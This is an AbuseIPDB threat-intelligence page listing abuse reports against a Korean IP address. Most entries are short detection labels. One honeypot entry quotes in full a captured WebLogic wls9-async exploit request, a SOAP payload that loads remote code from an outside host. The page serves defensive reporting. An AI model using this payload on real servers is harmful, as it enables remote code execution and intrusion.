JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 1.209.47.241

1.209.47.241 was found in our database!

This IP was reported 218 times. Confidence of Abuse is 0%: ?

ISP	LG Uplus
Usage Type	Commercial
ASN	AS3786
Domain Name	lguplus.com
Country	🇰🇷 Korea (the Republic of)
City	Seoul, Seoul

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 1.209.47.241

Whois 1.209.47.241

IP Abuse Reports for 1.209.47.241:

This IP address has been reported a total of 218 times from 30 distinct sources. 1.209.47.241 was first reported on December 25th 2020, and the most recent report was 11 months ago.

Old Reports: The most recent abuse report for this IP address is from 11 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 COMPLEX	2025-06-18 07:12:41 (11 months ago)	Honeypot [1]: HTTP/1.1 request on 8000 POST /_async/AsyncResponseService User-Agent: python-request ... show more Honeypot [1]: HTTP/1.1 request on 8000 POST /_async/AsyncResponseService User-Agent: python-requests/2.25.0 Accept: / Accept-Encoding: gzip, deflate POST Data: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</string><void><string>http://ximcx.cn</string></void></class></java> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>; 8000 [1], 9001 [1] TCP show less	Web App Attack
Anonymous	2025-06-05 01:23:00 (1 year ago)	WAF detection: Local File inclusion	Hacking
🇲🇾 Rizzy	2025-04-02 14:54:30 (1 year ago)	Multiple WAF Violations	Brute-Force Web App Attack
🇹🇭 MWA SOC	2025-04-02 09:04:47 (1 year ago)		Web App Attack
🇮🇪 RoboSOC	2025-04-01 03:58:16 (1 year ago)	Oracle WebLogic wls9-async Remote Code Execution Vulnerability, PTR: PTR record not found	Hacking
🇹🇭 MWA SOC	2025-04-01 00:33:52 (1 year ago)		Web App Attack
🇩🇪 jannga.de	2024-11-19 11:50:00 (1 year ago)	CVE-2022-26134 exploitation	Hacking Web App Attack
🇨🇿 Countryman	2024-11-19 06:14:17 (1 year ago)	IPS detection: Remote.CMD.Shell	Hacking
🇨🇿 Countryman	2024-11-18 16:26:39 (1 year ago)	IPS detection: HTTP.URI.Java.Expression.Language.Code.Injection	Hacking
🇨🇿 Countryman	2024-11-17 12:15:58 (1 year ago)	IPS detection: HTTP.URI.Java.Expression.Language.Code.Injection	Hacking
Anonymous	2024-11-16 23:59:40 (1 year ago)	WAF detection: Local File Inclusion	Web App Attack
🇨🇿 Countryman	2024-11-13 11:52:32 (1 year ago)	IPS detection: HTTP.URI.Java.Expression.Language.Code.Injection	Hacking
🇨🇿 Countryman	2024-11-11 10:50:44 (1 year ago)	IPS detection: HTTP.URI.Java.Expression.Language.Code.Injection	Hacking
🇨🇿 Countryman	2024-11-08 09:35:21 (1 year ago)	IPS detection: HTTP.URI.Java.Expression.Language.Code.Injection	Hacking
🇨🇿 Countryman	2024-11-04 17:26:23 (1 year ago)	IPS detection: HTTP.URI.Java.Expression.Language.Code.Injection	Hacking

Showing 1 to 15 of 218 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 205.169.39.19

🇺🇸 184.73.101.22

🇧🇷 164.152.39.78

🇺🇸 162.216.149.42

🇸🇬 148.66.130.53

🇷🇴 80.94.92.171

🇬🇧 35.203.210.208

🇷🇺 5.167.64.215

🇬🇧 185.132.36.5

🇨🇳 180.184.142.135

🇺🇸 172.96.140.156

🇫🇮 147.185.133.241

🇵🇰 119.156.45.16

🇹🇼 111.70.22.154

🇳🇱 88.151.33.116

🇷🇴 80.94.92.168

🇱🇹 62.60.130.59

🇸🇬 54.169.137.148

🇫🇷 51.159.149.103

🇳🇱 45.148.10.147